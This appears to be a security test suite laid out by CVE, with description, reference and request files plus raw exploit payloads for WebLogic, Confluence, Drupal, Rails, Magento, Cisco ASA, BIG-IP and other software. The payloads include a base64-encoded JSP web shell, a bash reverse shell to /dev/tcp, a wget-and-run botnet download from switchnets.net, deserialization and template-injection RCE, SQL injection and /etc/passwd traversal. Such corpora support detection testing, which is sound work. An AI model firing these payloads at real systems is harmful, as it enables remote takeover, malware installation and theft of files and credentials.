11 | echo IDwlQCBwYWdlIGltcG9ydD0iamF2YS51dGlsLiosamF2YS5pby4qIiU+CjwlCiU+CjxIVE1MPjxCT0RZPgpDb21tYW5kcyB3aXRoIEpTUAo8Rk9STSBNRVRIT0Q9IkdFVCIgTkFNRT0ibXlmb3JtIiBBQ1RJT049IiI+CjxJTlBVVCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZCI+CjwvRk9STT4KPHByZT4KPCUKaWYgKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSAhPSBudWxsKSB7CiAgICBvdXQucHJpbnRsbigiQ29tbWFuZDogIiArIHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSArICI8QlI+Iik7CiAgICBQcm9jZXNzIHA7CiAgICBpZiAoIFN5c3RlbS5nZXRQcm9wZXJ0eSgib3MubmFtZSIpLnRvTG93ZXJDYXNlKCkuaW5kZXhPZigid2luZG93cyIpICE9IC0xKXsKICAgICAgICBwID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiY21kLmV4ZSAvQyAiICsgcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgIH0KICAgIGVsc2V7CiAgICAgICAgcCA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgIH0KICAgIE91dHB1dFN0cmVhbSBvcyA9IHAuZ2V0T3V0cHV0U3RyZWFtKCk7CiAgICBJbnB1dFN0cmVhbSBpbiA9IHAuZ2V0SW5wdXRTdHJlYW0oKTsKICAgIERhdGFJbnB1dFN0cmVhbSBkaXMgPSBuZXcgRGF0YUlucHV0U3RyZWFtKGluKTsKICAgIFN0cmluZyBkaXNyID0gZGlzLnJlYWRMaW5lKCk7CiAgICB3aGlsZSAoIGRpc3IgIT0gbnVsbCApIHsKICAgIG91dC5wcmludGxuKGRpc3IpOwogICAgZGlzciA9IGRpcy5yZWFkTGluZSgpOwogICAgfQp9CiU+CjwvcHJlPgo8L0JPRFk+PC9IVE1MPiAKCg== |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/tests/CVE-2019-2725/test2.txt:
--------------------------------------------------------------------------------
1 | xxxx
2 |
3 |
4 |
5 | /bin/bash
6 |
7 |
8 | -c
9 |
10 |
11 | bash -i >& /dev/tcp/test/8080 0>&1
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/tests/CVE-2019-2725/test3.txt:
--------------------------------------------------------------------------------
1 | xxxx
2 |
3 |
4 |
5 | /bin/bash
6 |
7 |
8 | -c
9 |
10 |
11 | ls > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/favicon.ico
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/tests/CVE-2019-2725/test5.txt:
--------------------------------------------------------------------------------
1 | xxxx
--------------------------------------------------------------------------------
/tests/CVE-2019-2729/description.txt:
--------------------------------------------------------------------------------
1 | Vulnerability in the Oracle WebLogic Server component of Oracle Fusion
2 | Middleware (subcomponent: Web Services). Supported versions that are affected
3 | are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability
4 | allows unauthenticated attacker with network access via HTTP to compromise
5 | Oracle WebLogic Server. Successful attacks of this vulnerability can result in
6 | takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality,
7 | Integrity and Availability impacts). CVSS Vector:
8 | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
--------------------------------------------------------------------------------
/tests/CVE-2019-2729/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2729
--------------------------------------------------------------------------------
/tests/CVE-2019-2729/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/wls-wsat/CoordinatorPortType",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0",
7 | "Content-Type": "text/xml",
8 | "SOAPAction": "",
9 | "lfcmd": "msfcmd.read()"
10 | },
11 | "Data-File": "test1.txt",
12 | "Reference": "https://github.com/waffl3ss/CVE-2019-2729"
13 | }
14 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-3396/description.txt:
--------------------------------------------------------------------------------
1 | The Widget Connector macro in Atlassian Confluence Server before version 6.6.12
2 | (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed
3 | version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for
4 | 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x),
5 | allows remote attackers to achieve path traversal and remote code execution on
6 | a Confluence Server or Data Center instance via server-side template injection.
--------------------------------------------------------------------------------
/tests/CVE-2019-3396/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396
--------------------------------------------------------------------------------
/tests/CVE-2019-3396/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/rest/tinymce/1/macro/preview",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Accept": "text/plain, */*; q=0.01",
8 | "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
9 | "Accept-Encoding": "gzip, deflate, br",
10 | "Content-Type": "application/json; charset=utf-8",
11 | "X-Requested-With": "XMLHttpRequest",
12 | "Referer": "http://10.10.20.181/",
13 | "Content-Length": "167",
14 | "X-Forwarded-For": "127.0.0.2",
15 | "Connection": "keep-alive"
16 | },
17 | "Data-File": "test1.txt",
18 | "Reference": "https://github.com/jas502n/CVE-2019-3396"
19 | },
20 | {
21 | "Method": "POST",
22 | "URI": "/rest/tinymce/1/macro/preview",
23 | "Headers": {
24 | "User-Agent": "Mozilla/5.0",
25 | "Accept": "text/plain, */*; q=0.01",
26 | "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
27 | "Accept-Encoding": "gzip, deflate, br",
28 | "Content-Type": "application/json; charset=utf-8",
29 | "X-Requested-With": "XMLHttpRequest",
30 | "Referer": "http://10.10.20.181/",
31 | "Content-Length": "167",
32 | "X-Forwarded-For": "127.0.0.2",
33 | "Connection": "keep-alive"
34 | },
35 | "Data-File": "test2.txt",
36 | "Reference": "https://github.com/jas502n/CVE-2019-3396"
37 | }
38 | ]
39 |
--------------------------------------------------------------------------------
/tests/CVE-2019-3396/test1.txt:
--------------------------------------------------------------------------------
1 | {"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}}
--------------------------------------------------------------------------------
/tests/CVE-2019-3396/test2.txt:
--------------------------------------------------------------------------------
1 | {"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"ftp://10.10.20.166:8886/r.vm","command":"ifconfig"},"body":""}}
--------------------------------------------------------------------------------
/tests/CVE-2019-5418/description.txt:
--------------------------------------------------------------------------------
1 | There is a File Content Disclosure vulnerability in Action View (Rails)
2 | <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 where specially crafted accept headers
3 | can cause contents of arbitrary files on the target system's filesystem to be
4 | exposed.
--------------------------------------------------------------------------------
/tests/CVE-2019-5418/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5418
--------------------------------------------------------------------------------
/tests/CVE-2019-5418/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Accept": "../../../../../../../../../../etc/passwd{{"
8 | },
9 | "Reference": "https://github.com/mpgn/CVE-2019-5418"
10 | },
11 | {
12 | "Method": "POST",
13 | "URI": "/",
14 | "Headers": {
15 | "User-Agent": "Mozilla/5.0",
16 | "Accept": "../../../../../../../../../../etc/passwd{{"
17 | },
18 | "Data": {
19 | "hokus": "bogus"
20 | },
21 | "Reference": "https://github.com/mpgn/CVE-2019-5418"
22 | },
23 | {
24 | "Method": "GET",
25 | "URI": "/",
26 | "Headers": {
27 | "User-Agent": "Mozilla/5.0",
28 | "Accept": "../../.profile{{"
29 | },
30 | "Reference": "https://github.com/mpgn/CVE-2019-5418"
31 | },
32 | {
33 | "Method": "GET",
34 | "URI": "/",
35 | "Headers": {
36 | "User-Agent": "Mozilla/5.0",
37 | "Accept": "../../../../../../../../../../../../../e*c/h*s*s{{"
38 | },
39 | "Reference": "https://github.com/albinowax/ActiveScanPlusPlus/commit/979aba22796b1d0ad4b8ad948ecd004de72a2e78"
40 | },
41 | {
42 | "Method": "GET",
43 | "URI": "/",
44 | "Headers": {
45 | "User-Agent": "Mozilla/5.0",
46 | "Accept": "/tmp/web.bak.gz{{"
47 | },
48 | "Reference": "https://github.com/mpgn/CVE-2019-5418"
49 | },
50 | {
51 | "Method": "GET",
52 | "URI": "/",
53 | "Headers": {
54 | "User-Agent": "Mozilla/5.0",
55 | "Accept": "../../../../../Windows/system.ini{{"
56 | },
57 | "Reference": "https://github.com/mpgn/CVE-2019-5418"
58 | }
59 | ]
60 |
--------------------------------------------------------------------------------
/tests/CVE-2019-6340/description.txt:
--------------------------------------------------------------------------------
1 | Some field types do not properly sanitize data from non-form sources in Drupal
2 | 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary
3 | PHP code execution in some cases. A site is only affected by this if one of
4 | the following conditions is met: The site has the Drupal 8 core RESTful Web
5 | Services (rest) module enabled and allows PATCH or POST requests, or the
6 | site has another web services module enabled, like JSON:API in Drupal 8, or
7 | Services or RESTful Web Services in Drupal 7. (Note: The Drupal 7 Services
8 | module itself does not require an update at this time, but you should apply
9 | other contributed updates associated with this advisory if Services is in
10 | use.)
--------------------------------------------------------------------------------
/tests/CVE-2019-6340/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6340
--------------------------------------------------------------------------------
/tests/CVE-2019-6340/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/drupal-8.6.9/node/200?_format=hal_json",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/hal+json"
8 | },
9 | "Data-File": "test1.txt",
10 | "Reference": "https://github.com/oways/CVE-2019-6340"
11 | },
12 | {
13 | "Method": "POST",
14 | "URI": "/drupal-8.6.9/node/200?_format=hal_json",
15 | "Headers": {
16 | "User-Agent": "Mozilla/5.0",
17 | "Content-Type": "application/hal+json"
18 | },
19 | "Data-File": "test1.txt",
20 | "Reference": "https://github.com/oways/CVE-2019-6340"
21 | },
22 | {
23 | "Method": "GET",
24 | "URI": "/drupal-8.6.9/node/1?_format=hal_json",
25 | "Headers": {
26 | "User-Agent": "Mozilla/5.0",
27 | "Content-Type": "application/hal+json"
28 | },
29 | "Data-File": "test2.txt",
30 | "Reference": "https://www.exploit-db.com/exploits/46452"
31 | },
32 | {
33 | "Method": "POST",
34 | "URI": "/drupal-8.6.9/node/1?_format=hal_json",
35 | "Headers": {
36 | "User-Agent": "Mozilla/5.0",
37 | "Content-Type": "application/hal+json"
38 | },
39 | "Data-File": "test2.txt",
40 | "Reference": "https://www.exploit-db.com/exploits/46452"
41 | }
42 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-6340/test1.txt:
--------------------------------------------------------------------------------
1 | {
2 | "_links": {
3 | "type": {
4 | "href": "http://192.168.1.1/rest/type/shortcut/default"
5 | }
6 | },
7 | "link": [{
8 | "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:8:\"ipconfig\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}",
9 | "value": "link"
10 | }]
11 | }
--------------------------------------------------------------------------------
/tests/CVE-2019-6340/test2.txt:
--------------------------------------------------------------------------------
1 | {
2 | "_links": {
3 | "type": {
4 | "href": "http://192.168.1.1/rest/type/shortcut/default"
5 | }
6 | },
7 | "link": [{
8 | "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}",
9 | "value": "link"
10 | }]
11 | }
--------------------------------------------------------------------------------
/tests/CVE-2019-6341/description.txt:
--------------------------------------------------------------------------------
1 | In Drupal 7 versions prior to 7.65; Drupal 8.6 versions prior to 8.6.13;Drupal
2 | 8.5 versions prior to 8.5.14. Under certain circumstances the File
3 | module/subsystem allows a malicious user to upload a file that can trigger a
4 | cross-site scripting (XSS) vulnerability.
--------------------------------------------------------------------------------
/tests/CVE-2019-6341/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6341
--------------------------------------------------------------------------------
/tests/CVE-2019-6341/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/user/register?element_parents=user_picture/widget/0&ajax_form=1&_wrapper_format=drupal_ajax",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Accept": "application/json, text/javascript, */*; q=0.01",
8 | "Accept-Language": "en-US,en;q=0.5",
9 | "X-Requested-With": "XMLHttpRequest",
10 | "Referer": "http://localhost/user/register",
11 | "Content-Length": "2377"
12 | },
13 | "Data-File": "test1.txt",
14 | "Reference": "https://github.com/thezdi/PoC/tree/master/Drupal"
15 | }
16 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-6341/test1.txt:
--------------------------------------------------------------------------------
1 | Content-Type: multipart/form-data; boundary=---------------------------60928216114129559951791388325
2 | Connection: close
3 |
4 | -----------------------------60928216114129559951791388325
5 | Content-Disposition: form-data; name=mail
6 |
7 | test324@example.com
8 | -----------------------------60928216114129559951791388325
9 | Content-Disposition: form-data; name=name
10 |
11 | test2345
12 | -----------------------------60928216114129559951791388325
13 | Content-Disposition: form-data; name=files[user_picture_0]; filename=xxx\xc0.gif
14 | Content-Type: image/gif
15 |
16 | GIF
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 | -----------------------------60928216114129559951791388325
25 | Content-Disposition: form-data; name=user_picture[0][fids]
26 |
27 |
28 | -----------------------------60928216114129559951791388325
29 | Content-Disposition: form-data; name=user_picture[0][display]
30 |
31 | 1
32 | -----------------------------60928216114129559951791388325
33 | Content-Disposition: form-data; name=form_build_id
34 |
35 | form-KyXRvDVovOBjofviDPTw682MQ8Bf5es0PyF-AA2Buuk
36 | -----------------------------60928216114129559951791388325
37 | Content-Disposition: form-data; name=form_id
38 |
39 | user_register_form
40 | -----------------------------60928216114129559951791388325
41 | Content-Disposition: form-data; name=contact
42 |
43 | 1
44 | -----------------------------60928216114129559951791388325
45 | Content-Disposition: form-data; name=timezone
46 |
47 | America/New_York
48 | -----------------------------60928216114129559951791388325
49 | Content-Disposition: form-data; name=_triggering_element_name
50 |
51 | user_picture_0_upload_button
52 | -----------------------------60928216114129559951791388325
53 | Content-Disposition: form-data; name=_triggering_element_value
54 |
55 | Upload
56 | -----------------------------60928216114129559951791388325
57 | Content-Disposition: form-data; name=_drupal_ajax
58 |
59 | 1
60 | -----------------------------60928216114129559951791388325
61 | Content-Disposition: form-data; name=ajax_page_state[theme]
62 |
63 | bartik
64 | -----------------------------60928216114129559951791388325
65 | Content-Disposition: form-data; name=ajax_page_state[theme_token]
66 |
67 |
68 | -----------------------------60928216114129559951791388325
69 | Content-Disposition: form-data; name=ajax_page_state[libraries]
70 |
71 | bartik/global-styling,classy/base,classy/messages,core/drupal.ajax,core/drupal.collapse,core/drupal.timezone,core/html5shiv,core/jquery.form,core/normalize,file/drupal.file,system/base
72 | -----------------------------60928216114129559951791388325--
73 |
--------------------------------------------------------------------------------
/tests/CVE-2019-6703/description.txt:
--------------------------------------------------------------------------------
1 | Incorrect access control in migla_ajax_functions.php in the Calmar Webmedia
2 | Total Donations plugin through 2.0.5 for WordPress allows unauthenticated
3 | attackers to update arbitrary WordPress option values, leading to site
4 | takeover. These attackers can send requests to wp-admin/admin-ajax.php to call
5 | the miglaA_update_me action to change arbitrary options on affected sites.
6 | This can be used to enable new user registration and set the default role for
7 | new users to Administrator.
--------------------------------------------------------------------------------
/tests/CVE-2019-6703/reference.txt:
--------------------------------------------------------------------------------
1 | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6703
2 | https://www.wordfence.com/blog/2019/01/wordpress-sites-compromised-via-zero-day-vulnerabilities-in-total-donations-plugin/
--------------------------------------------------------------------------------
/tests/CVE-2019-6703/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/wp-admin/admin-ajax.php?action=migla_getme",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | },
9 | "Reference": ""
10 | },
11 | {
12 | "Method": "POST",
13 | "URI": "/wp-admin/admin-ajax.php?action=migla_getme",
14 | "Headers": {
15 | "User-Agent": "Mozilla/5.0",
16 | "Content-Type": "application/x-www-form-urlencoded",
17 | "Connection": "close"
18 | },
19 | "Data": {
20 | "bogus": "parameter"
21 | },
22 | "Reference": ""
23 | },
24 | {
25 | "Method": "POST",
26 | "URI": "/wp-admin/admin-ajax.php",
27 | "Headers": {
28 | "User-Agent": "Mozilla/5.0",
29 | "Content-Type": "application/x-www-form-urlencoded",
30 | "Connection": "close"
31 | },
32 | "Data": {
33 | "action": "migla_getme"
34 | },
35 | "Reference": ""
36 | }
37 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-7139/description.txt:
--------------------------------------------------------------------------------
1 | An unauthenticated user can execute SQL statements that allow arbitrary read
2 | access to the underlying database, which causes sensitive data leakage. This
3 | issue is fixed in Magento 2.1 prior to 2.1.18, Magento 2.2 prior to 2.2.9,
4 | Magento 2.3 prior to 2.3.2.
--------------------------------------------------------------------------------
/tests/CVE-2019-7139/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7139
--------------------------------------------------------------------------------
/tests/CVE-2019-7139/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=0&ids[0][product_id][to]=))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE 1=1) -- -",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | },
9 | "Reference": "https://snyk.io/vuln/SNYK-PHP-MAGENTOCORE-174031"
10 | }
11 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-7265/description.txt:
--------------------------------------------------------------------------------
1 | Linear eMerge E3-Series devices allow Remote Code Execution (root access over
2 | SSH).
--------------------------------------------------------------------------------
/tests/CVE-2019-7265/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7265
--------------------------------------------------------------------------------
/tests/CVE-2019-7265/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60",
5 | "Headers": {
6 | "User-Agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
7 | "Connection": "close"
8 | },
9 | "Reference": "https://honeydb.io"
10 | }
11 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-8394/description.txt:
--------------------------------------------------------------------------------
1 | Zoho ManageEngine ServiceDesk Plus (SDP) before 10.0 build 10012 allows remote
2 | attackers to upload arbitrary files via login page customization.
--------------------------------------------------------------------------------
/tests/CVE-2019-8394/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8394
--------------------------------------------------------------------------------
/tests/CVE-2019-8394/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/common/FileAttachment.jsp?module=CustomLogin&view=Dashboard1",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36",
7 | "Content-Length": "508",
8 | "Content-Type": "multipart/form-data; boundary=----aaa",
9 | "Accept-Encoding": "gzip, deflate",
10 | "Accept-Language": "en-US,en;q=0.9,vi;q=0.8",
11 | "Cookie": "COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; JSESSIONID=66716A38326AE43058F4A71FCF4E1E42; JSESSIONIDSSO=6970EB5659C20DFF0CF5015D9C91448E; sdpcsrfcookie=ec189770-d1aa-4db3-9a97-36f4ab3db380",
12 | "Connection": "close"
13 | },
14 | "Data-File": "test1.txt",
15 | "Reference": "https://www.exploit-db.com/exploits/46413"
16 | }
17 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-8394/test1.txt:
--------------------------------------------------------------------------------
1 | ------aaa
2 | Content-Disposition: form-data; name="sspsetup"
3 |
4 | Attach
5 | ------aaa
6 | Content-Disposition: form-data; name="module"
7 |
8 | CustomLogin
9 | ------aaa
10 | Content-Disposition: form-data; name="filePath"; filename="test.jsp"
11 | Content-Type: text/html
12 |
13 | This is shell content
14 | ------aaa
15 | Content-Disposition: form-data; name="hmtlcontent"
16 |
17 |
18 | ------aaa--
--------------------------------------------------------------------------------
/tests/CVE-2020-14882/description.txt:
--------------------------------------------------------------------------------
1 | Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware
2 | (component: Console). Supported versions that are affected are 10.3.6.0.0,
3 | 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable
4 | vulnerability allows unauthenticated attacker with network access via HTTP to
5 | compromise Oracle WebLogic Server. Successful attacks of this vulnerability can
6 | result in takeover of Oracle WebLogic Server.
--------------------------------------------------------------------------------
/tests/CVE-2020-14882/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14882
--------------------------------------------------------------------------------
/tests/CVE-2020-14882/test1.txt:
--------------------------------------------------------------------------------
1 | _nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('ps');
--------------------------------------------------------------------------------
/tests/CVE-2020-14882/test2.txt:
--------------------------------------------------------------------------------
1 | _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
2 | weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
3 | java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
4 | field.setAccessible(true);
5 | Object obj = field.get(adapter);
6 | weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
7 | String cmd = req.getHeader("cmd");
8 | String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
9 | if (cmd != null) {
10 | String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
11 | weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);
12 | res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
13 | res.getServletOutputStream().flush();
14 | res.getWriter().write("");
15 | }executeThread.interrupt();
16 | ");
--------------------------------------------------------------------------------
/tests/CVE-2020-14882/test3.txt:
--------------------------------------------------------------------------------
1 | _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime('calc.exe');");
--------------------------------------------------------------------------------
/tests/CVE-2020-14882/test4.txt:
--------------------------------------------------------------------------------
1 | _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://172.16.242.1:8989/poc.xml")
--------------------------------------------------------------------------------
/tests/CVE-2020-14882/test5.txt:
--------------------------------------------------------------------------------
1 | _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22ps%22)
--------------------------------------------------------------------------------
/tests/CVE-2020-3452/description.txt:
--------------------------------------------------------------------------------
1 | A vulnerability in the web services interface of Cisco Adaptive Security
2 | Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software
3 | could allow an unauthenticated, remote attacker to conduct directory traversal
4 | attacks and read sensitive files on a targeted system. The vulnerability is
5 | due to a lack of proper input validation of URLs in HTTP requests processed by
6 | an affected device. An attacker could exploit this vulnerability by sending a
7 | crafted HTTP request containing directory traversal character sequences to an
8 | affected device. A successful exploit could allow the attacker to view
9 | arbitrary files within the web services file system on the targeted device.
10 | The web services file system is enabled when the affected device is configured
11 | with either WebVPN or AnyConnect features. This vulnerability cannot be used to
12 | obtain access to ASA or FTD system files or underlying operating system (OS)
13 | files.
--------------------------------------------------------------------------------
/tests/CVE-2020-3452/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3452
--------------------------------------------------------------------------------
/tests/CVE-2020-3452/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=+CSCOE+/portal_inc.lua",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | },
9 | "Reference": "https://github.com/0x5ECF4ULT/CVE-2020-3452"
10 | },
11 | {
12 | "Method": "GET",
13 | "URI": "/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/useralert.html&default-language&lang=../",
14 | "Headers": {
15 | "User-Agent": "Mozilla/5.0",
16 | "Connection": "close"
17 | },
18 | "Reference": "https://github.com/3ndG4me/CVE-2020-3452-Exploit"
19 | }
20 | ]
--------------------------------------------------------------------------------
/tests/CVE-2020-5902/description.txt:
--------------------------------------------------------------------------------
1 | In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3,
2 | 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User
3 | Interface (TMUI), also referred to as the Configuration utility, has a Remote
4 | Code Execution (RCE) vulnerability in undisclosed pages.
--------------------------------------------------------------------------------
/tests/CVE-2020-5902/reference.txt:
--------------------------------------------------------------------------------
1 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5902
--------------------------------------------------------------------------------
/tests/CVE-2020-5902/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/tmui/login.jsp..;/tmui/locallb/workspace",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | },
9 | "Reference": ""
10 | },
11 | {
12 | "Method": "GET",
13 | "URI": "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin",
14 | "Headers": {
15 | "User-Agent": "Mozilla/5.0",
16 | "Connection": "close"
17 | },
18 | "Reference": "https://twitter.com/x4ce/status/1279790599793545216"
19 | },
20 | {
21 | "Method": "GET",
22 | "URI": "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd",
23 | "Headers": {
24 | "User-Agent": "Mozilla/5.0",
25 | "Connection": "close"
26 | },
27 | "Reference": "https://twitter.com/x4ce/status/1279790599793545216"
28 | },
29 | {
30 | "Method": "GET",
31 | "URI": "/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/",
32 | "Headers": {
33 | "User-Agent": "Mozilla/5.0",
34 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
35 | "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
36 | "Accept-Encoding": "gzip, deflate",
37 | "Connection": "close"
38 | },
39 | "Reference": "https://github.com/jas502n/CVE-2020-5902"
40 | }
41 | ]
--------------------------------------------------------------------------------
/tests/CVE-2020-6286/description.txt:
